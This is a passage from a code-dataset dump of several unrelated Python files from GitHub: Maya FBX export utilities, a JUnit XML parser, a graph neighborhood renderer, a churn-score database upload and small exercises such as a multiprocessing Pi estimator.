ET\r\n\r\n\r\ndef xml_to_csv(path):\r\n xml_list = []\r\n for xml_file in glob.glob(path + '/*.xml'):\r\n tree = ET.parse(xml_file)\r\n root = tree.getroot()\r\n for member in root.findall('object'):\r\n value = (root.find('filename').text,\r\n int(root.find('size')[0].text),\r\n int(root.find('size')[1].text),\r\n member[0].text,\r\n int(member[4][0].text),\r\n int(member[4][1].text),\r\n int(member[4][2].text),\r\n int(member[4][3].text)\r\n )\r\n xml_list.append(value)\r\n column_names = ['filename', 'width', 'height',\r\n 'class', 'xmin', 'ymin', 'xmax', 'ymax']\r\n xml_df = pd.DataFrame(xml_list, columns=column_names)\r\n return xml_df\r\n\r\n\r\ndef main():\r\n parser = argparse.ArgumentParser()\r\n\r\n parser.add_argument(\r\n '-o', '--outfile', help='Filename for output csv.', required=True)\r\n\r\n parser.add_argument('-f', '--folder',\r\n help='Folder containing images and xml label files (default: current)')\r\n\r\n args = parser.parse_args()\r\n\r\n folder = args.folder\r\n if folder == None:\r\n folder = os.getcwd()\r\n\r\n xml_df = xml_to_csv(folder)\r\n if xml_df.shape[0] > 0:\r\n xml_df.to_csv(args.outfile, index=None)\r\n print('Successfully converted xml to csv.')\r\n else:\r\n print('Nothing to convert.')\r\n\r\n\r\nmain()\r\n","repo_name":"leewilkie/MLUtil","sub_path":"gen_label_csv.py","file_name":"gen_label_csv.py","file_ext":"py","file_size_in_byte":1738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} 
+{"seq_id":"4100574894","text":"# @Author : rookie\n# @Date : 2022/5/25 22:15\n# @file : baseApi.py\n\nimport requests,inspect,sys\n\nfrom study.Study_delivery_system.Utils.handle_yaml import get_yaml_data\nfrom study.Study_delivery_system.conf.public_conf import host\n\n\nclass BaseApi:\n def __init__(self): #初始化方法\n \"\"\"\n 根据子类类名,���取接口的url和请求方式\n \"\"\"\n #__class__.__name__ 获取子类名称\n self.data=get_yaml_data('../conf/apiConfig.yaml')[self.__class__.__name__]\n\n def request_send(self,indata):\n \"\"\"\n 公共请求方法\n :param indata: 请求体\n :return: 调用接口的响应值\n \"\"\"\n funcName=inspect.stack()[1][3]\n path,method=self.data[funcName].values()\n resp=requests.request(method=method,url=f'{host}{path}',data=indata)\n return resp\n\ndef a():\n print('执行函数---a')\n print('谁调用了函数a--->',inspect.stack()[1][3])\n\ndef b():\n print('执行函数---b')\n a()\n print('b函数当前自己的函数名--->',sys._getframe().f_code.co_name)\n\n\n# b()\nif __name__ == '__main__':\n a()","repo_name":"tester-rookie/testgit","sub_path":"study/Study_delivery_system/Common/baseApi.py","file_name":"baseApi.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"19634356498","text":"import os\nimport sys\nimport ctypes\nimport ctypes.wintypes\nimport traceback\nimport subprocess\nimport tempfile\n\nimport pymel.core as pm\nimport maya.cmds as cmds\nimport maya.mel as mel\nimport maya.api.OpenMaya as om\n\nfrom mgear.vendor.Qt import QtWidgets, QtCore\n\nfrom mgear.core import (\n pyFBX as pfbx,\n pyqt,\n string,\n utils as coreUtils,\n animLayers,\n)\n# from mgear.shifter.game_tools_fbx import sdk_utils\n\nNO_EXPORT_TAG = \"no_export\"\nWORLD_CONTROL_NAME = \"world_ctl\"\n\nFRAMES_PER_SECOND = {\n \"24 FPS\": (\"film\", 24),\n \"30 FPS\": (\"ntsc\", 30),\n \"60 FPS\": (\"ntscf\", 60),\n \"120 FPS\": (\"120fps\", 120),\n}\nAS_FRAMES = dict(FRAMES_PER_SECOND.values())\nTRANSFORM_ATTRIBUTES = [\n \"tx\",\n \"ty\",\n \"tz\",\n \"rx\",\n \"ry\",\n \"rz\",\n \"sx\",\n \"sy\",\n \"sz\",\n \"visibility\",\n]\n\n\nclass SelectorDialog(QtWidgets.QDialog):\n def __init__(\n self, items=[], title=\"Selector Dialog\", parent=pyqt.maya_main_window()\n ):\n super(SelectorDialog, self).__init__(parent)\n self.title = title\n self.items = items\n self.item = None\n\n self.setWindowTitle(self.title)\n self.setWindowFlags(\n self.windowFlags() ^ QtCore.Qt.WindowContextHelpButtonHint\n )\n\n self.create_widgets()\n self.create_layout()\n self.create_connections()\n\n def create_widgets(self):\n self.list_wgt = QtWidgets.QListWidget()\n for item in self.items:\n self.list_wgt.addItem(item.name())\n\n self.ok_btn = QtWidgets.QPushButton(\"OK\")\n\n def create_layout(self):\n button_layout = QtWidgets.QHBoxLayout()\n button_layout.addStretch()\n button_layout.addWidget(self.ok_btn)\n\n main_layout = QtWidgets.QVBoxLayout(self)\n main_layout.setContentsMargins(2, 2, 2, 2)\n main_layout.setSpacing(2)\n main_layout.addWidget(self.list_wgt)\n main_layout.addStretch()\n main_layout.addLayout(button_layout)\n\n def create_connections(self):\n self.list_wgt.itemClicked.connect(self.get_item)\n self.list_wgt.itemDoubleClicked.connect(self.accept)\n\n self.ok_btn.clicked.connect(self.accept)\n\n def get_item(self, item):\n self.item = item.text()\n\n\ndef export_animation_clip(config_data, clip_data):\n \"\"\"\n Exports a singular animation clip.\n\n config_data: The configuration for the scene/session\n clip_data: Information about the clip to be exported.\n\n :return: return the 
path of the newly exported fbx.\n :rtype: str\n \"\"\"\n # Clip Data\n start_frame = clip_data.get(\n \"start_frame\", cmds.playbackOptions(query=True, minTime=True)\n )\n end_frame = clip_data.get(\n \"end_frame\", cmds.playbackOptions(query=True, maxTime=True)\n )\n title = clip_data.get(\"title\", \"\")\n frame_rate = clip_data.get(\"geo_root\", coreUtils.get_frame_rate())\n anim_layer = clip_data.get(\"anim_layer\", \"\")\n\n # Config Data\n root_joint = config_data.get(\"joint_root\", \"\")\n file_path = config_data.get(\"file_path\", \"\")\n file_name = config_data.get(\"file_name\", \"\")\n preset_path = config_data.get(\"preset_path\", None)\n up_axis = config_data.get(\n \"up_axis\", cmds.optionVar(query=\"upAxisDirection\")\n )\n file_type = config_data.get(\"file_type\", \"binary\").lower()\n fbx_version = config_data.get(\"fbx_version\", None)\n\n # Validate timeline range\n if start_frame > end_frame:\n msg = \"Start frame {} must be lower than the end frame {}\"\n cmds.error(msg.format(start_frame, end_frame))\n return False\n\n # Validate file path\n if not file_path or not file_name:\n msg = \"No valid file path or file name given for the FBX to export!\"\n cmds.warning(msg)\n return False\n\n if title:\n file_name = \"{}_{}\".format(file_name, title)\n if not file_name.endswith(\".fbx\"):\n file_name = \"{}.fbx\".format(file_name)\n path = string.normalize_path(os.path.join(file_path, file_name))\n print(\"\\t>>> Export Path: {}\".format(path))\n\n auto_key_state = cmds.autoKeyframe(query=True, state=True)\n cycle_check = cmds.cycleCheck(query=True, evaluation=True)\n scene_modified = cmds.file(query=True, modified=True)\n current_frame_range = cmds.currentUnit(query=True, time=True)\n current_frame = cmds.currentTime(query=True)\n original_start_frame = cmds.playbackOptions(query=True, minTime=True)\n original_end_frame = cmds.playbackOptions(query=True, maxTime=True)\n temp_mesh = None\n temp_skin_cluster = None\n original_anim_layer_weights = animLayers.get_layer_weights()\n\n try:\n # default mute status to on\n animlayer_mute = True\n\n # set anim layer to enable\n if animLayers.animation_layer_exists(anim_layer):\n animLayers.set_layer_weight(anim_layer, toggle_other_off=True)\n \n # Store anim layer mute status\n animlayer_mute = cmds.animLayer(anim_layer, query=True, mute=True)\n cmds.animLayer(anim_layer, edit=True, mute=False)\n\n # disable viewport\n mel.eval(\"paneLayout -e -manage false $gMainPane\")\n\n pfbx.FBXResetExport()\n\n # set configuration\n fbx_version_str = None\n if preset_path is not None:\n # load FBX export preset file\n pfbx.FBXLoadExportPresetFile(f=preset_path)\n if up_axis is not None:\n pfbx.FBXExportUpAxis(up_axis.lower())\n if fbx_version is not None:\n fbx_version_str = \"{}00\".format(\n fbx_version.split(\"/\")[0].replace(\" \", \"\")\n )\n pfbx.FBXExportFileVersion(v=fbx_version_str)\n if file_type == \"ascii\":\n pfbx.FBXExportInAscii(v=True)\n\n # # create temporal triangle to skin\n # temp_mesh = cmds.polyCreateFacet(point=[(-0, 0, 0), (0, 0, 0), (0, 0, 0)], name='mgear_temp_mesh')[0]\n # temp_skin_cluster = cmds.skinCluster(\n # [root_joint], temp_mesh, toSelectedBones=False, maximumInfluences=1, skinMethod=0)[0]\n\n # select elements to export\n pm.select([root_joint])\n\n # Set frame range\n cmds.currentTime(start_frame)\n old_frame_rate = coreUtils.get_frame_rate()\n new_frame_rate = frame_rate\n # only set if frame rate changed\n mult_rate = new_frame_rate / old_frame_rate\n if mult_rate != 1:\n old_range = start_frame, 
end_frame\n start_frame = old_range[0] * mult_rate\n end_frame = old_range[1] * mult_rate\n coreUtils.set_frame_rate(frame_rate)\n\n pm.autoKeyframe(state=False)\n pfbx.FBXExportAnimationOnly(v=False)\n pfbx.FBXExportBakeComplexAnimation(v=True)\n pfbx.FBXExportBakeComplexStart(v=start_frame)\n pfbx.FBXExportBakeComplexEnd(v=end_frame)\n pfbx.FBXExportCameras(v=True)\n pfbx.FBXExportConstraints(v=True)\n pfbx.FBXExportLights(v=True)\n pfbx.FBXExportQuaternion(v=\"quaternion\")\n pfbx.FBXExportAxisConversionMethod(\"none\")\n pfbx.FBXExportApplyConstantKeyReducer(v=False)\n pfbx.FBXExportSmoothMesh(v=False)\n pfbx.FBXExportShapes(v=True)\n pfbx.FBXExportSkins(v=True)\n pfbx.FBXExportSkeletonDefinitions(v=True)\n pfbx.FBXExportEmbeddedTextures(v=False)\n pfbx.FBXExportInputConnections(v=True)\n pfbx.FBXExportInstances(v=True)\n pfbx.FBXExportUseSceneName(v=True)\n pfbx.FBXExportSplitAnimationIntoTakes(c=True)\n pfbx.FBXExportGenerateLog(v=False)\n pfbx.FBXExport(f=path, s=True)\n except Exception as exc:\n raise exc\n finally:\n # setup again original anim layer weights\n if anim_layer and original_anim_layer_weights:\n animLayers.set_layer_weights(original_anim_layer_weights)\n # Sets the animation layer back to default\n cmds.animLayer(anim_layer, edit=True, mute=animlayer_mute)\n\n if temp_skin_cluster and cmds.objExists(temp_skin_cluster):\n cmds.delete(temp_skin_cluster)\n if temp_mesh and cmds.objExists(temp_mesh):\n cmds.delete(temp_mesh)\n\n cmds.currentTime(current_frame)\n cmds.currentUnit(time=current_frame_range)\n\n pm.autoKeyframe(state=auto_key_state)\n pm.cycleCheck(evaluation=cycle_check)\n cmds.playbackOptions(min=original_start_frame, max=original_end_frame)\n\n # if the scene was not modified before doing our changes, we force it back now\n if scene_modified is False:\n cmds.file(modified=False)\n\n # enable viewport\n mel.eval(\"paneLayout -e -manage true $gMainPane\")\n\n return path\n\n\ndef create_mgear_playblast(\n file_name=\"\", folder=None, start_frame=None, end_frame=None, scale=75\n):\n file_name = file_name or \"playblast\"\n file_name = os.path.splitext(os.path.basename(file_name))[0]\n file_name = \"{}.avi\".format(file_name)\n time_range = cmds.playbackOptions(\n query=True, minTime=True\n ), cmds.playbackOptions(query=True, maxTime=True)\n start_frame = start_frame if start_frame is not None else time_range[0]\n end_frame = end_frame if end_frame is not None else time_range[1]\n if end_frame <= start_frame:\n end_frame = start_frame + 1\n\n if not folder or not os.path.isdir(folder):\n folder = get_mgear_playblasts_folder()\n if not os.path.isdir(folder):\n os.makedirs(folder)\n if not os.path.isdir(folder):\n cmds.warning(\n 'Was not possible to create mgear playblasts folder: \"{}\"'.format(\n folder\n )\n )\n return False\n full_path = os.path.join(folder, file_name)\n count = 1\n while os.path.isfile(full_path):\n _file_name = \"{}_{}{}\".format(\n os.path.splitext(file_name)[0],\n count,\n os.path.splitext(file_name)[1],\n )\n full_path = os.path.join(folder, _file_name)\n count += 1\n\n cmds.playbackOptions(\n animationStartTime=start_frame,\n minTime=start_frame,\n animationEndTime=end_frame,\n maxTime=end_frame,\n )\n cmds.currentTime(start_frame, edit=True)\n cmds.playblast(p=scale, filename=full_path, forceOverwrite=True)\n\n return True\n\n\ndef get_mgear_playblasts_folder():\n CSIDL_PERSONAL = 5 # My Documents\n SHGFP_TYPE_CURRENT = 0 # Get current, not default value\n buf = ctypes.create_unicode_buffer(ctypes.wintypes.MAX_PATH)\n 
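 # NOTE (editor's sketch, not part of the original file): SHGetFolderPathW
 # writes the folder mapped to the given CSIDL constant into buf;
 # CSIDL_PERSONAL (5) resolves the user's \"My Documents\" folder, which makes
 # this helper Windows-only. A hypothetical cross-platform fallback:
 # documents_folder = os.path.join(os.path.expanduser(\"~\"), \"Documents\")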
ctypes.windll.shell32.SHGetFolderPathW(\n None, CSIDL_PERSONAL, None, SHGFP_TYPE_CURRENT, buf\n )\n documents_folder = os.path.abspath(buf.value)\n playblasts_folder = os.path.join(documents_folder, \"mgear_playblasts\")\n\n return playblasts_folder\n\n\ndef open_mgear_playblast_folder():\n folder = get_mgear_playblasts_folder()\n if not folder or not os.path.isdir(folder):\n cmds.warning(\n 'Was not possible to open mgear playblasts folder: \"{}\"'.format(\n folder\n )\n )\n return False\n\n if sys.platform.startswith(\"darwin\"):\n subprocess.Popen([\"open\", folder])\n elif os.name == \"nt\":\n os.startfile(folder)\n elif os.name == \"posix\":\n subprocess.Popen([\"xdg-open\", folder])\n else:\n cmds.error(\"OS not supported: {}\".format(os.name))\n\n return True\n\n\ndef get_geo_grp():\n \"\"\"Return the geometry group (objectSet in Maya) of the rig.\n If more than one xxx_geo_grp is available will pop up a selection list\n\n Returns:\n PyNode: objectSet\n \"\"\"\n geo_grp = None\n geo_groups = pm.ls(\"*:*_geo_grp\", \"*_geo_grp\", type=\"objectSet\")\n if geo_groups:\n if len(geo_groups) > 1:\n item = select_item(geo_groups, \"Select Geo Group\")\n if item:\n geo_grp = pm.PyNode(item)\n else:\n geo_grp = geo_groups[0]\n return geo_grp\n\n\ndef get_geo_root():\n geo_grp = get_geo_grp()\n if geo_grp:\n memb = geo_grp.members()\n if memb:\n return memb\n else:\n pm.displayWarning(\"Geo_grp is empty. Please set geo root manually\")\n else:\n pm.displayWarning(\n \"Not Geo_grp available, please set geo roots manually\"\n )\n\n\ndef get_joint_org():\n jnt_org = None\n joint_orgs = pm.ls(\"*:jnt_org\", \"*jnt_org\", type=\"transform\")\n if joint_orgs:\n if len(joint_orgs) > 1:\n item = select_item(joint_orgs, \"Select Joint Org Node\")\n if item:\n jnt_org = pm.PyNode(item)\n else:\n jnt_org = joint_orgs[0]\n return jnt_org\n\n\ndef get_joint_root():\n jnt_org = get_joint_org()\n if jnt_org:\n return jnt_org.getChildren()\n else:\n pm.displayWarning(\n \"Not Joint found under jnt_org, please set joint roots manually\"\n )\n\n\ndef select_item(items, title):\n \"\"\"Create modal dialog to select item from list and return the selected tiem\n\n Args:\n items (list): List of str items\n title (str): Tittle for the modoal dialo\n\n Returns:\n str: selected item\n \"\"\"\n item = None\n select_dialog = SelectorDialog(items, title)\n\n result = select_dialog.exec_()\n\n if result == QtWidgets.QDialog.Accepted:\n item = select_dialog.item\n\n return item\n\n\ndef get_end_joint(start_joint):\n end_joint = None\n next_joint = start_joint\n while next_joint:\n child_list = (\n pm.listRelatives(next_joint, fullPath=True, c=True) or list()\n )\n child_joints = pm.ls(child_list, long=True, type=\"joint\") or list()\n if child_joints:\n next_joint = child_joints[0]\n else:\n end_joint = next_joint\n next_joint = None\n\n return end_joint\n\n# ------- namespaces ------\n\n\ndef _count_namespaces(name):\n # Custom function to count the number of \":\" in a name\n return name.count(':')\n\n\ndef clean_namespaces(export_data):\n \"\"\"\n Gets all available namespaces in scene.\n Checks each for objects that have it assigned.\n Removes the namespace from the object.\n \"\"\"\n namespaces = get_scene_namespaces()\n\n # Sort namespaces by longest nested first\n namespaces = sorted(namespaces, key=_count_namespaces, reverse=True)\n\n for namespace in namespaces:\n print(\" - {}\".format(namespace))\n child_namespaces = om.MNamespace.getNamespaces(namespace, True)\n\n for chld_ns in child_namespaces:\n m_objs = 
om.MNamespace.getNamespaceObjects(chld_ns)\n for m_obj in m_objs:\n remove_namespace(m_obj)\n\n m_objs = om.MNamespace.getNamespaceObjects(namespace)\n for m_obj in m_objs:\n remove_namespace(m_obj)\n\n filtered_export_data = clean_export_namespaces(export_data)\n return filtered_export_data\n\n\ndef clean_export_namespaces(export_data):\n \"\"\"\n Looks at all the joints and mesh data in the export data and removes\n any namespaces that exists.\n \"\"\"\n \n for key in export_data.keys():\n\n # ignore filepath, as it contains ':', which will break the path\n if key == \"file_path\" or key == \"color\":\n continue\n\n value = export_data[key]\n\n print(key, value)\n\n if isinstance(value, list):\n for i in range(len(value)):\n value[i] = trim_namespace_from_name(value[i])\n elif isinstance(value, dict):\n value = clean_export_namespaces(value)\n elif isinstance(value, str):\n value = trim_namespace_from_name(value)\n\n export_data[key] = value\n\n return export_data\n\n\ndef count_namespaces(name):\n # Custom function to count the number of \":\" in a name\n return name.count(':')\n\n\ndef trim_namespace_from_name(name):\n if name.find(\":\") >= 0:\n return name.split(\":\")[-1]\n return name\n\n\ndef remove_namespace(mobj):\n \"\"\"\n Removes the namesspace that is currently assigned to the asset\n \"\"\"\n dg = om.MFnDependencyNode(mobj)\n name = dg.name()\n dg.setName(name[len(dg.namespace):])\n\n\ndef get_scene_namespaces():\n \"\"\"\n Gets all namespaces in the scene.\n \"\"\"\n IGNORED_NAMESPACES = [\":UI\", \":shared\", \":root\"]\n spaces = om.MNamespace.getNamespaces(recurse=True)\n for ignored in IGNORED_NAMESPACES:\n if ignored in spaces:\n spaces.remove(ignored)\n\n return spaces\n\n\ndef get_scene_path():\n \"\"\"\n Get the file path of the current scene.\n\n Returns:\n str: path of the current open scene file\n \"\"\"\n return cmds.file(query=True, sceneName=True)\n\n\nif __name__ == \"__main__\":\n if sys.version_info[0] == 2:\n reload(pfbx)\n else:\n import importlib\n\n importlib.reload(pfbx)\n\n # export_skeletal_mesh(\n # \"Root\", \"geo_root\", r\"C:\\Users/Miquel/Desktop/testing_auto2.fbx\"\n # )\n\n grp = get_joint_root()\n print(grp)\n","repo_name":"MonsieurGallo/mgear4","sub_path":"release/scripts/mgear/shifter/game_tools_fbx/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":16782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"35"} +{"seq_id":"29638590156","text":"def MinDivisor(n):\r\n i = 1\r\n divider = 1\r\n while i <= n**0.5:\r\n if n % i == 0 and n // i < n:\r\n divider = i\r\n break\r\n else:\r\n divider = n\r\n i += 1\r\n return divider\r\n\r\n\r\nn = int(input())\r\nprint(MinDivisor(n))\r\n","repo_name":"Zohaval/Coursera","sub_path":"4.4.py","file_name":"4.4.py","file_ext":"py","file_size_in_byte":275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"22198120211","text":"import networkx as nx\nimport json\nimport numpy as np\n\nfrom graph.models import full_network, Node\nfrom graph.utils.render_subgraph import edge_to_indexed_dictionary\n\n\ndef closed_neighbors(digraph: nx.DiGraph, node_name: str):\n return list(digraph.subgraph(\n nx.all_neighbors(digraph, node_name)).nodes) + [node_name]\n\n\ndef closed_neighborhood(digraph: nx.DiGraph, node_name: str):\n return digraph.subgraph(closed_neighbors(digraph, node_name))\n \n \ndef node_adj(digraph: nx.DiGraph, center: str, other: str, pred=None, succ=None):\n \"\"\" can pass in precalculated 
lists or generators of pred and succ \"\"\"\n if pred is None:\n pred = list(digraph.predecessors(center))\n if succ is None:\n succ = list(digraph.successors(center))\n output = 0\n if other in succ:\n output += 1\n if other in pred:\n output += 2\n return output\n \n\ndef neighborhood_nodes(digraph: nx.DiGraph, node_name: str):\n output = []\n idx = 0\n pred = list(digraph.predecessors(node_name))\n succ = list(digraph.successors(node_name))\n for node in digraph:\n node_dict = {}\n node_dict[\"name\"] = node\n node_dict[\"index\"] = idx\n node_dict[\"title\"] = digraph.nodes[node][\"title\"]\n node_dict[\"url\"] = digraph.nodes[node][\"url\"]\n node_dict[\"adj\"] = node_adj(digraph, node_name, node_dict[\"name\"], pred, succ)\n output.append(node_dict)\n idx += 1\n return output\n\n\ndef neighborhood_edges(digraph: nx.DiGraph, node_list, center: str):\n output = []\n for edge in digraph.edges:\n edge_dict = edge_to_indexed_dictionary(edge, node_list)\n if edge[0] == center:\n edge_dict[\"direction\"] = \"out\"\n elif edge[1] == center:\n edge_dict[\"direction\"] = \"in\"\n else:\n edge_dict[\"direction\"] = \"secondary\"\n output.append(edge_dict)\n return output\n\n\ndef neighbor_sentence(center: str, nodes: dict):\n title = Node.objects.get(name=center).title\n n_succ = len(list(full_network.dg.successors(center)))\n n_pred = len(list(full_network.dg.predecessors(center)))\n succ_word = \"successor\" if n_succ == 1 else \"successors\"\n pred_word = \"predecessor\" if n_pred == 1 else \"predecessors\"\n return f'The article \"{title}\" links to {n_succ} {succ_word} and is linked to by {n_pred} {pred_word}.'\n\n\ndef render_neighborhood(center: str):\n cn = closed_neighborhood(full_network.dg, center)\n nodes = neighborhood_nodes(cn, center)\n node_dicts = list(nodes)\n edges = neighborhood_edges(cn, nodes, center)\n json_nodes = json.dumps(nodes, ensure_ascii=False)\n json_edges = json.dumps(edges, ensure_ascii=False)\n sentence = neighbor_sentence(center, nodes)\n return json_nodes, json_edges, sentence, node_dicts\n\n\n","repo_name":"reppertj/philosophical-graphiti","sub_path":"graph/utils/neighbors.py","file_name":"neighbors.py","file_ext":"py","file_size_in_byte":2829,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"35"} +{"seq_id":"16158311602","text":"import logging\nfrom xml.etree import ElementTree\nfrom datetime import timedelta\n\n\nlogger = logging.getLogger(__name__)\n\n\ndef parse_time(string_value):\n try:\n return float(string_value)\n except:\n return 0.0\n\n\ndef parse_properties(root):\n properties = []\n for child in root:\n tag = child.tag\n if tag != \"property\":\n continue\n property_name = child.get(\"name\", \"\").strip()\n property_value = child.get(\"value\", \"\")\n if property_name:\n properties.append({\"name\": property_name, \"value\": property_value})\n return properties\n\n\ndef parse_element(root):\n testcase = {\n \"name\": root.attrib.get(\"name\", \"\"),\n \"classname\": root.attrib.get(\"classname\", \"\"),\n \"regression\": False,\n \"successfix\": False,\n \"time\": parse_time(root.attrib.get(\"time\", \"0\")),\n \"message\": \"\",\n \"value\": \"\",\n \"action\": \"passed\",\n \"type\": \"\",\n \"stdout\": None,\n \"stderr\": None,\n \"properties\": [],\n }\n for child in root:\n tag = child.tag\n if tag not in [\n \"skipped\",\n \"error\",\n \"failure\",\n \"system-out\",\n \"system-err\",\n \"properties\",\n ]:\n continue\n text = child.text\n if tag == \"system-out\":\n testcase[\"stdout\"] = 
text\n elif tag == \"system-err\":\n testcase[\"stderr\"] = text\n elif tag == \"properties\":\n testcase[\"properties\"] = parse_properties(child)\n else:\n testcase[\"action\"] = tag\n testcase[\"message\"] = child.get(\"message\", \"\")\n testcase[\"type\"] = child.get(\"type\", \"\")\n testcase[\"value\"] = text\n return testcase\n\n\ndef junit2dict(file_descriptor):\n results = {\n \"success\": 0,\n \"errors\": 0,\n \"failures\": 0,\n \"regressions\": 0,\n \"successfixes\": 0,\n \"skips\": 0,\n \"total\": 0,\n \"testscases\": [],\n \"time\": 0,\n }\n try:\n test_duration = timedelta(seconds=0)\n for event, element in ElementTree.iterparse(file_descriptor):\n if element.tag == \"testcase\":\n testcase = parse_element(element)\n results[\"total\"] += 1\n time = parse_time(testcase.get(\"time\", \"0\"))\n test_duration += timedelta(seconds=time)\n action = testcase[\"action\"]\n if action == \"skipped\":\n results[\"skips\"] += 1\n if action == \"error\":\n results[\"errors\"] += 1\n if action == \"failure\":\n results[\"failures\"] += 1\n results[\"testscases\"].append(testcase)\n element.clear()\n results[\"success\"] = (\n results[\"total\"]\n - results[\"failures\"]\n - results[\"errors\"]\n - results[\"skips\"]\n )\n results[\"time\"] += int(test_duration.total_seconds() * 1000)\n except ElementTree.ParseError as pe:\n results[\"error\"] = \"ParseError: %s \" % str(pe)\n logger.error(\"ParseError %s\" % str(pe))\n except Exception as e:\n results[\"error\"] = \"Exception: %s \" % str(e)\n logger.exception(e)\n return results\n\n\ndef _concat_classname_and_name(testcase):\n return \"%s:%s\" % (testcase[\"classname\"], testcase[\"name\"])\n\n\ndef add_regressions_and_successfix_to_tests(testsuite1, testsuite2):\n # dict from testcase's name to each testcase itself for fast access\n testscases1_map = dict()\n for testcase in testsuite1[\"testscases\"]:\n testkey = _concat_classname_and_name(testcase)\n testscases1_map[testkey] = testcase\n\n for testcase in testsuite2[\"testscases\"]:\n testkey2 = _concat_classname_and_name(testcase)\n # this is a new test then ignore it\n if testkey2 not in testscases1_map:\n continue\n prev_testcase = testscases1_map[testkey2]\n # if switch from success to failure then its a regression\n if testcase[\"action\"] == \"failure\":\n if prev_testcase[\"action\"] == \"passed\" or prev_testcase[\"regression\"]:\n testcase[\"regression\"] = True\n testsuite2[\"regressions\"] += 1\n # if switch from either failure/regression to success its successfix\n elif testcase[\"action\"] == \"passed\":\n if prev_testcase[\"action\"] == \"failure\" or prev_testcase[\"regression\"]:\n testcase[\"successfix\"] = True\n testsuite2[\"successfixes\"] += 1\n return testsuite2\n","repo_name":"redhat-cip/dci-control-server","sub_path":"dci/api/v1/transformations.py","file_name":"transformations.py","file_ext":"py","file_size_in_byte":4580,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"35"} +{"seq_id":"9614550259","text":"import pandas as pd\nimport os\nimport datetime\n\nimport sqlalchemy\nfrom pyspark.sql import SparkSession\n\nML_PREDICT_DIR = os.path.dirname(os.path.abspath(__file__))\nML_DIR = os.path.dirname(ML_PREDICT_DIR)\nSRC_DIR = os.path.dirname(ML_DIR)\nBASE_DIR = os.path.dirname(SRC_DIR)\nDATA_DIR = os.path.join(BASE_DIR, 'data')\nDATA_PREDICT_DIR = os.path.join(DATA_DIR, 'predict')\nDATA_SCORE_DIR = os.path.join(DATA_DIR, 'score')\nMODEL_DIR = os.path.join(BASE_DIR, 'models')\n\nprint(\"Importando os dados com 
score...\", end=\"\")\ndf = pd.read_csv(os.path.join(DATA_SCORE_DIR, \"tb_score.csv\"),\n sep = \"|\",\n index_col=[0])\nprint(\"ok.\")\n\nprint(\"Abrindo conexão com banco de dados...\", end=\"\")\nDATABASE_DIR = os.path.abspath(os.path.join(__file__, \"../../../../..\"))\nspark = sqlalchemy.create_engine(\"sqlite:///\" + str(DATABASE_DIR) +\"\\\\database\\\\olist.db\")\nprint(\"ok.\")\n\n\nprint(df.head())\n\n# Evitando que haja duplicatas de previsoes feitas no mesmo dia\ntry:\n query = sqlalchemy.text(\"DELETE FROM tb_score_churn WHERE dt_ref IN :ids;\")\n query = query.bindparams(sqlalchemy.bindparam('ids', expanding=True))\n spark.execute(query, ids=list(df['dt_ref'].unique()))\nexcept:\n print('tabela vazia/primeiro dado do dia')\n\nprint(\"Salvando dataframe no banco de dados...\", end=\"\\n\")\ndf.to_sql(\"tb_score_churn\", spark, if_exists=\"append\")\nprint(\"ok.\")\n","repo_name":"lucwas/olist-churn","sub_path":"crm_churn/src/ml/predict/upload.py","file_name":"upload.py","file_ext":"py","file_size_in_byte":1368,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"35"} +{"seq_id":"9550622530","text":"\"\"\"\r\n 4IRC\r\n Exercice approximation de la valeur de PI par la méthode de l'esperance\r\n Groupe :\r\n - Maxime BATTU\r\n - Eileen BALAGUER\r\n - Batiste LALOI\r\n\"\"\"\r\n\r\nimport time\r\nimport multiprocessing as mp\r\nimport math\r\nimport random\r\n\r\nNB_PROCESS = 4\r\n\r\ndef loiEsperance(array, queue):\r\n \"\"\"\r\n Méthode prenant un tableau de valeur et une Queue\r\n Elle permet de calculer la moyenne d'une aire d'un cercle par la méthode d'espérance\r\n \"\"\"\r\n somme = 0\r\n\r\n formule = \"math.sqrt(1 - math.pow(x, 2))\"\r\n\r\n for nombre in array:\r\n f = formule.replace(\"x\", str(nombre))\r\n somme += eval(f)\r\n \r\n queue.put(somme)\r\n\r\n\r\ndef estimePI(pi, nbIterations):\r\n \"\"\"\r\n Permet d'estimer PI\r\n \"\"\"\r\n return pi / nbIterations\r\n\r\n\r\nif __name__ == \"__main__\":\r\n queue = mp.Queue()\r\n\r\n # Nombre d’essai pour l’estimation\r\n nbIterations = 1_000_000\r\n \r\n start = time.time()\r\n\r\n # Tableau de processus\r\n processes = []\r\n\r\n tableau = [random.random() for _ in range(nbIterations)]\r\n \r\n # Création du multiprocessing\r\n for i in range(NB_PROCESS):\r\n process = mp.Process(target=loiEsperance, args=(tableau, queue,))\r\n processes.append(process)\r\n process.start()\r\n\r\n pi = 0\r\n for process in processes:\r\n process.join()\r\n pi += estimePI(queue.get(), nbIterations)\r\n\r\n print(\r\n f\"Valeur estimée Pi par la méthode d'espérance avec {NB_PROCESS} processus : {pi}\")\r\n \r\n end = time.time()\r\n\r\n temps = end - start\r\n\r\n print(\r\n f\"Temps de traitement {temps:.2f} secondes pour {nbIterations} iterations en multiprocess\")\r\n","repo_name":"MaximeBattu/programmation_concurrente","sub_path":"python/multiprocessing/estimation-PI-esperance.py","file_name":"estimation-PI-esperance.py","file_ext":"py","file_size_in_byte":1687,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"10932289920","text":"import numpy as np\nimport random as rnd\nimport sys\nimport scipy.optimize\n\n# dictionary = {'c_k': [alpha_k, c_k]}\n\n\n################################# FUNCTIONS ##################################\n\ndef c_k(dictionary):\n c_k_list = [dictionary[key][1] for key in dictionary.keys()]\n return np.array(c_k_list)\n\ndef alpha_k(dictionary):\n alpha_k_list = [dictionary[key][0] for key in 
